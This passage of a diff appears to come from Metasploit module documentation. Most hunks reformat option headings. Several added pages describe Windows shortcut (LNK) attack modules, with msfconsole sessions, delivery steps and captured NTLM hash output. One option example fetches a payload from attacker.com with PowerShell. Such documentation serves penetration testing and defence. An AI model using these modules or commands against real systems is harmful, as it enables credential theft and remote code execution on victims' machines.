 The link should automatically be parsed on the phone and clickable.

-**SMTPADDRESS**
+### SMTPADDRESS

 The mail server address you wish to use to send the text messages.

-**SMTPPORT**
+### SMTPPORT

 The mail server port. By default, this is ```25```.

-**SMTPUSERNAME**
+### SMTPUSERNAME

 The username you use to log into the SMTP server.

-**SMTPPASSWORD**
+### SMTPPASSWORD

 The password you use to log into the SMTP server.

-**SMTPFROM**
+### SMTPFROM

 The FROM field of SMTP. In some cases, it may be used as ```SMTPUSER```.

@@ -73,7 +73,6 @@ The module supports the following carriers:
 * Virgin Mobile

 **Note:** During development, we could not find a valid gateway for Sprint, therefore it is currently
-not supported.

 ### Finding the Carrier for a Phone Number

@@ -24,13 +24,13 @@ This module authenticates to AWS EC2 (Elastic Compute Cloud) to identify compute

 ## Options

-  **ACCESS_KEY_ID**
+### ACCESS_KEY_ID

  This AWS credential is like a username.  It uniquely identifies the user, and is paired with a 'secret access key'.  The access key ID is retrievable through the AWS console.
  
  An example `ACCESS_KEY_ID` would be `AKIA5C76TR3KXHXA5CRC`

-  **SECRET_ACCESS_KEY**
+### SECRET_ACCESS_KEY

  This AWS credential is like a password, and should be treated as such.  It is paired with a 'access key ID'.  The access key ID cannot be retrieved from AWS after it has been generated, but it may be discoverable through environment variables, configuration files, source code, or backups.
  
@@ -23,25 +23,25 @@ This module authenticates to AWS IAM (Identify Access Module) to identify user a

 ## Options

-  **ACCESS_KEY_ID**
+### ACCESS_KEY_ID

  This AWS credential is like a username.  It uniquely identifies the user, and is paired with a 'secret access key'.  The access key ID is retrievable through the AWS console.
  
  An example `ACCESS_KEY_ID` would be `AKIA5C76TR3KXHXA5CRC`

-  **SECRET_ACCESS_KEY**
+### SECRET_ACCESS_KEY

  This AWS credential is like a password, and should be treated as such.  It is paired with a 'access key ID'.  The access key ID cannot be retrieved from AWS after it has been generated, but it may be discoverable through environment variables, configuration files, source code, or backups.
  
  An example `SECRET_ACCESS_KEY` would be `EKfx3wOWWiGk1WgBTAZfF\2dq3SbDsQj4jdyOMOv`.

-  **REGION**
+### REGION

  AWS resources are located in regions.  Optionally, this module's output can be filtered based on region to minimize the query to AWS.  Alternatively, `REGION` can be left blank, such that all regions will be checked.
  
  An example region would be `us-west-2`.

-  **LIMIT**
+### LIMIT

  Some AWS API calls support limiting output, such that the module will only return the number of instances, without detailing the configuration of each instance.  Optionally, this module's output can be filtered to minimize the query to AWS and the user output.  Alternatively, `LIMIT` can be left blank, such that all EC2 instances will be detailed.
  
@@ -24,19 +24,19 @@ This module authenticates to AWS S3 (Simple Storage Service), to identify bucket

 ## Options

-  **ACCESS_KEY_ID**
+### ACCESS_KEY_ID

  This AWS credential is like a username.  It uniquely identifies the user, and is paired with a 'secret access key'.  The access key ID is retrievable through the AWS console.
  
  An example `ACCESS_KEY_ID` would be `AKIA5C76TR3KXHXA5CRC`

-  **SECRET_ACCESS_KEY**
+### SECRET_ACCESS_KEY

  This AWS credential is like a password, and should be treated as such.  It is paired with a 'access key ID'.  The access key ID cannot be retrieved from AWS after it has been generated, but it may be discoverable through environment variables, configuration files, source code, or backups.
  
  An example `SECRET_ACCESS_KEY` would be `EKfx3wOWWiGk1WgBTAZfF/2dq3SbDsQj4jdyOMOv`.

-  **REGION**
+### REGION

  AWS resources are located in regions.  Optionally, this module's output can be filtered based on region to minimize the query to AWS.  Alternatively, `REGION` can be left blank, such that all regions will be checked.
  
@@ -21,7 +21,7 @@

 ## Options

-  **TARGETURI**
+### TARGETURI

  The URI where the multipart form is located.  There is no real default and this will change based on the application.

@@ -93,4 +93,4 @@ msf auxiliary(apache_commons_fileupload_dos) > run
 ```

 ![tomcat7_dos](https://cloud.githubusercontent.com/assets/752491/22169486/71980e2e-df42-11e6-8353-4f1e260375ee.png)
- 
+ 
@@ -8,23 +8,23 @@ Please refer to [https://cablehaunt.com/](https://cablehaunt.com/) for more info

 ## Options

-**WS_USERNAME**
+### WS_USERNAME

 This is the basic auth username for the spectrum analysis web service.  This is typically default credentials such as `admin:password` but may also be something along the lines of `spectrum:spectrum`.  This will vary from manufacturer to manufacturer and ISP to ISP.

-**WS_PASSWORD**
+### WS_PASSWORD

 This is the basic auth password for the spectrum analysis web service.

-**TIMEOUT**
+### TIMEOUT

 This is the timeout in seconds that the module should wait before making a conclusion on the success of the payload delivery.  Typically, the device crashes within about 5 second of the payload being delivered.  The default value of `15` should be seen as the lower bound for `TIMEOUT` values.

-**RHOSTS**
+### RHOSTS

 Typically the only address which should be used for this value is `192.168.100.1`. It can be different, but not in a well-secured configuration.

-**RPORT**
+### RPORT

 On some devices the Spectrum Analysis web service runs on port `8080`, though Lyrebirds (the original discoverer and PoC author) notes that sometimes it can run on port `6080`.

@@ -12,16 +12,22 @@

 ## Options

- **DOSTYPE**
+### DOSTYPE

-	GENTLE: *Current sessions will continue to work, but not future ones*
-	  A lack of input sanitation permits an attacker to submit a request that will be added to the resources and will be used as regex rule it is possible then to make a valid regex rule that captures all the new handler requests. The sessions that were established previously will continue to work.
+#### GENTLE

-	SOFT: *No past or future sessions will work*
-      A lack of input sanitation and lack of exception handling causes Metasploit to behave abnormally when looking an appropriate resource for the request, by submitting an invalid regex as a resource. This means that no request, current or future will get served an answer.
+*Current sessions will continue to work, but not future ones*
+A lack of input sanitation permits an attacker to submit a request that will be added to the resources and will be used as regex rule it is possible then to make a valid regex rule that captures all the new handler requests. The sessions that were established previously will continue to work.

-	HARD: *ReDOS or Catastrophic Regex Backtracking*
-	  A lack of input sanitization on paths added as resources allows an attacker to execute a catastrophic regex backtracking operation causing a Denial of Service by CPU consumption.
+#### SOFT
+
+*No past or future sessions will work*
+A lack of input sanitation and lack of exception handling causes Metasploit to behave abnormally when looking an appropriate resource for the request, by submitting an invalid regex as a resource. This means that no request, current or future will get served an answer.
+
+#### HARD
+
+*ReDOS or Catastrophic Regex Backtracking*
+A lack of input sanitization on paths added as resources allows an attacker to execute a catastrophic regex backtracking operation causing a Denial of Service by CPU consumption.

 ## Scenarios

@@ -19,15 +19,15 @@ FoxIT after version 9.1 is no longer vulnerable.

 ## Options

-**FILENAME**
+### FILENAME
 This option allows you to customise the generated filename.
 This can be changed using set FILENAME test.pdf

-**LHOST**
+### LHOST
 This option allows you to set the IP address of the SMB Listener that the document points to
 This can be changed using set LHOST 192.168.1.25

-**PDFINJECT**
+### PDFINJECT
 This option allows you to inject the UNC code into an existing PDF document
 This can be changed using set PDFINJECT /path/to/file/pdf.pdf

@@ -89,4 +89,4 @@ msf auxiliary(fileformat/badpdf) > exploit
 [\*] Auxiliary module execution completed
 msf auxiliary(fileformat/badpdf) > 
 
-  ```
+  ```
@@ -0,0 +1,94 @@
+## Vulnerable Application
+
+Windows systems where LNK files are processed, such as in Explorer or when shortcuts are executed.
+This can lead to arbitrary command execution via manipulated command line buffers.
+
+References:
+- [ZDI-CAN-25373](https://www.zerodayinitiative.com/advisories/ZDI-CAN-25373/)
+- [Windows LNK Research](https://zeifan.my/Windows-LNK/)
+- [Gist Example](https://gist.github.com/nafiez/1236cc4c808a489e60e2927e0407c8d1)
+- [Trend Micro Analysis](https://www.trendmicro.com/en_us/research/25/c/windows-shortcut-zero-day-exploit.html)
+
+Disclosure Date: 2025-07-19.
+
+## Verification Steps
+
+1. Start msfconsole.
+1. Load the module: `use auxiliary/fileformat/windows_lnk_padding`.
+1. Optionally customize FILENAME, DESCRIPTION, ICON_PATH, or BUFFER_SIZE.
+1. Execute the module: `run`.
+1. A malicious LNK file will be generated.
+1. Deliver the LNK file to the target Windows system.
+1. Open the LNK file to trigger command execution (e.g., launching calc.exe).
+
+## Options
+
+
+### COMMAND
+
+The command to execute when the LNK is opened.
+
+Default: `C:\\Windows\\System32\\calc.exe`
+
+Example:
+```
+set COMMAND powershell.exe -c "Invoke-WebRequest -Uri http://attacker.com/payload"
+```
+
+### DESCRIPTION
+
+Optional description for the LNK file. If not set, a random sentence is generated.
+
+Example:
+```
+set DESCRIPTION Important Document
+```
+
+### ICON_PATH
+
+Optional path to an icon for the LNK file. If not set, a random system icon path is generated.
+
+Example:
+```
+set ICON_PATH %SystemRoot%\\System32\\shell32.dll
+```
+
+### BUFFER_SIZE
+
+The size of the whitespace padding buffer before the command (must be sufficient to avoid truncation).
+
+Default: 900
+
+Example:
+```
+set BUFFER_SIZE 1000
+```
+
+## Scenarios
+
+### Basic Command Execution on Windows
+
+Target: Any Windows system (e.g., Windows 10 or later).
+
+Generate an LNK that launches Calculator with custom padding:
+
+```
+msf > use auxiliary/fileformat/windows_lnk_padding
+msf auxiliary(fileformat/windows_lnk_padding) > set FILENAME calc.lnk
+FILENAME => calc.lnk
+msf auxiliary(fileformat/windows_lnk_padding) > set COMMAND C:\\Windows\\System32\\calc.exe
+COMMAND => C:\\Windows\\System32\\calc.exe
+msf auxiliary(fileformat/windows_lnk_padding) > set BUFFER_SIZE 900
+BUFFER_SIZE => 900
+msf auxiliary(fileformat/windows_lnk_padding) > set DESCRIPTION Calculator Shortcut
+DESCRIPTION => Calculator Shortcut
+msf auxiliary(fileformat/windows_lnk_padding) > set ICON_PATH %SystemRoot%\\System32\\calc.exe
+ICON_PATH => %SystemRoot%\\System32\\calc.exe
+msf auxiliary(fileformat/windows_lnk_padding) > run
+
+[*] Generating LNK file: calc.lnk
+[+] Successfully created calc.lnk
+[*] Command line buffer size: 900 bytes
+[*] Target command: C:\\Windows\\System32\\calc.exe
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,104 @@
+## Vulnerable Application
+
+Windows systems where LNK files are processed in Explorer, particularly during right-click actions that load context menus.
+This can result in NTLM credential leaks over SMB.
+
+References:
+- [Right-Click LNK](https://zeifan.my/Right-Click-LNK/)
+
+Disclosure Date: 2025-05-06.
+
+## Verification Steps
+
+1. Start msfconsole.
+1. Load the module: `use auxiliary/fileformat/right_click_lnk_leak`.
+1. Optionally customize FILENAME, DESCRIPTION, ICON_PATH, or PADDING_SIZE.
+1. Execute the module: `run`.
+1. A malicious LNK file is generated.
+1. Set up an SMB capture listener (e.g., `auxiliary/server/capture/smb`).
+1. Deliver the LNK file to the target system.
+1. Right-click the LNK file in Explorer to trigger the SMB connection.
+1. Monitor the listener for captured NTLM hashes.
+
+## Options
+
+### DESCRIPTION
+
+The description for the shortcut.
+
+Default: `Testing Purposes`
+
+Example:
+```
+set DESCRIPTION Important File
+```
+
+### ICON_PATH
+
+The path to an icon for the LNK file.
+
+Default: `e.g. abc.ico`
+
+Example:
+```
+set ICON_PATH %SystemRoot%\\System32\\shell32.dll
+```
+
+### PADDING_SIZE
+
+Size of padding in the command arguments.
+
+Default: 10
+
+Example:
+```
+set PADDING_SIZE 20
+```
+
+## Scenarios
+
+### NTLM Hash Capture on Right-Click
+
+Target: Windows system with Explorer (e.g., Windows 10 or later).
+
+Generate the LNK file:
+
+```
+msf > use auxiliary/fileformat/right_click_lnk_leak
+msf auxiliary(fileformat/right_click_lnk_leak) > set DESCRIPTION Fake Document
+DESCRIPTION => Fake Document
+msf auxiliary(fileformat/right_click_lnk_leak) > set ICON_PATH %SystemRoot%\\System32\\imageres.dll
+ICON_PATH => %SystemRoot%\\System32\\imageres.dll
+msf auxiliary(fileformat/right_click_lnk_leak) > set PADDING_SIZE 15
+PADDING_SIZE => 15
+msf auxiliary(fileformat/right_click_lnk_leak) > run
+
+[*] Creating 'context.lnk' file...
+[+] LNK file created: context.lnk
+[*] Set up a listener (e.g., auxiliary/server/capture/smb) to capture the authentication
+[*] Auxiliary module execution completed
+```
+
+Set up the capture listener on the attacker machine:
+
+```
+msf > use auxiliary/server/capture/smb
+msf auxiliary(server/capture/smb) > set SRVHOST 192.168.1.25
+SRVHOST => 192.168.1.25
+msf auxiliary(server/capture/smb) > run
+[*] Server started.
+```
+
+Deliver `context.lnk` to the target. When the victim right-clicks it, an SMB connection is attempted:
+
+```
+[*] SMB Captured - 2025-09-18 21:08:00 +0530
+NTLMv2 Response Captured from 192.168.1.50:49180 - 192.168.1.50
+USER:targetuser DOMAIN:TARGETPC OS: Windows 10 LM:
+LMHASH:Disabled
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:examplehashvalue
+NT_CLIENT_CHALLENGE:examplechallenge
+```
+
+Use cracking tools to recover credentials from the hash.
@@ -0,0 +1,88 @@
+## Vulnerable Application
+
+Windows systems using Explorer to browse directories with LNK files, where the IconEnvironmentDataBlock can force SMB authentication leaks.
+
+References:
+- [Right-Click LNK](https://zeifan.my/Right-Click-LNK/)
+
+Disclosure Date: 2025-05-16.
+
+## Verification Steps
+
+1. Start msfconsole.
+1. Load the module: `use auxiliary/fileformat/iconenvironmentdatablock_lnk`.
+1. Set options like FILENAME, or others as needed.
+1. Execute the module: `run`.
+1. A malicious LNK file is generated.
+1. Place the LNK in a target directory.
+1. Browse the directory in Windows Explorer to trigger the SMB connection.
+1. Check the console for captured NTLM hashes.
+
+## Options
+
+
+### DESCRIPTION
+
+Optional description for the shortcut. If unset, a random sentence is generated.
+
+Example:
+```
+set DESCRIPTION System Update
+```
+
+### ICON_PATH
+
+Optional icon path for the LNK. If unset, a random system icon path is generated.
+
+Example:
+```
+set ICON_PATH %SystemRoot%\\System32\\shell32.dll
+```
+
+### PADDING_SIZE
+
+Size of padding in the command arguments.
+
+Default: 10
+
+Example:
+```
+set PADDING_SIZE 20
+```
+
+
+## Scenarios
+
+### NTLM Hash Capture via Integrated Server
+
+Target: Windows system with Explorer.
+
+```
+msf > use auxiliary/fileformat/iconenvironmentdatablock_lnk
+msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > set FILENAME leak.lnk
+FILENAME => leak.lnk
+msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > set SRVHOST 192.168.1.25
+SRVHOST => 192.168.1.25
+msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > set DESCRIPTION Fake Shortcut
+DESCRIPTION => Fake Shortcut
+msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > set PADDING_SIZE 15
+PADDING_SIZE => 15
+msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > run
+
+[*] Creating 'leak.lnk' file...
+[+] LNK file created: leak.lnk
+[*] Listening for hashes on 192.168.1.25:445
+[*] Auxiliary module execution completed
+```
+
+Deliver `leak.lnk` to a target folder. Browsing the folder triggers an SMB connection:
+
+```
+[*] SMB Captured - 2025-09-18 21:07:00 +0530
+NTLMv2 Response Captured from 192.168.1.50:49180 - 192.168.1.50
+USER:victim DOMAIN:VICTIMPC OS: Windows 10 LM:
+LMHASH:Disabled
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:samplehash
+NT_CLIENT_CHALLENGE:samplechallenge
+```
@@ -20,21 +20,21 @@ without providing any warning to the user. This allows an attacker the opportuni

 ## Options

-**CREATOR**
+### CREATOR

 This option allows you to customise the document author for the new document:
 ```
 set CREATOR New_User
 ```

-**FILENAME**
+### FILENAME

 This option allows you to customise the generated filename:
 ```
 set FILENAME salary.odt
 ```

-**LHOST**
+### LHOST

 This option allows you to set the IP address of the SMB Listener that the .odt document points to:

@@ -0,0 +1,72 @@
+## Vulnerable Application
+
+Windows operating systems that process LNK files via Explorer, particularly when browsing directories containing the malicious shortcut.
+This can lead to NTLM credential leaks over SMB.
+
+References:
+- [Right-Click LNK](https://zeifan.my/Right-Click-LNK/)
+- [Exploit-DB 42382](https://www.exploit-db.com/exploits/42382)
+
+Disclosure Date: 2025-05-10 (reported to MSRC).
+
+## Verification Steps
+
+1. Start msfconsole.
+2. Load the module: `use auxiliary/fileformat/specialfolderdatablock_lnk`.
+3. Customize options as needed (e.g., set FILENAME or APPNAME).
+4. Execute the module: `run`.
+5. A malicious LNK file will be generated.
+6. If not using a custom UNCPATH, the module starts an SMB capture server automatically.
+7. Place the LNK file in a directory on the target system.
+8. Browse to the directory in Windows Explorer to trigger the SMB connection.
+9. Monitor the console for captured NTLM hashes.
+
+## Options
+
+### APPNAME
+
+Sets the display name of the application in the LNK file. If empty, a random name is generated.
+
+Example:
+```
+set APPNAME FakeApp
+```
+
+
+## Scenarios
+
+### Basic NTLM Hash Capture on Windows
+
+Target: A Windows system with Explorer (e.g., Windows 10 or later).
+
+Attacker: Use the module to generate the LNK and capture hashes locally.
+
+```
+msf > use auxiliary/fileformat/specialfolderdatablock_lnk
+msf auxiliary(fileformat/specialfolderdatablock_lnk) > set FILENAME malicious.lnk
+FILENAME => malicious.lnk
+msf auxiliary(fileformat/specialfolderdatablock_lnk) > set SRVHOST 192.168.1.25
+SRVHOST => 192.168.1.25
+msf auxiliary(fileformat/specialfolderdatablock_lnk) > set APPNAME FakeApp
+APPNAME => FakeApp
+msf auxiliary(fileformat/specialfolderdatablock_lnk) > run
+
+[*] Starting SMB server on 192.168.1.25:445
+[*] Generating malicious LNK file
+[+] malicious.lnk stored at /root/.msf4/local/malicious.lnk
+[*] Listening for hashes on 192.168.1.25:445
+[*] Auxiliary module execution completed
+```
+
+Deliver the `malicious.lnk` file to the target (e.g., via email or shared drive).
+When the victim opens the containing folder in Explorer, an SMB connection is attempted:
+
+```
+[*] SMB Captured - 2025-09-18 21:03:00 +0530
+NTLMv2 Response Captured from 192.168.1.50:49180 - 192.168.1.50
+USER:targetuser DOMAIN:TARGETPC OS: Windows 10 LM:
+LMHASH:Disabled
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:examplehashvalue
+NT_CLIENT_CHALLENGE:examplechallenge
+```
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .2.5
 .3.8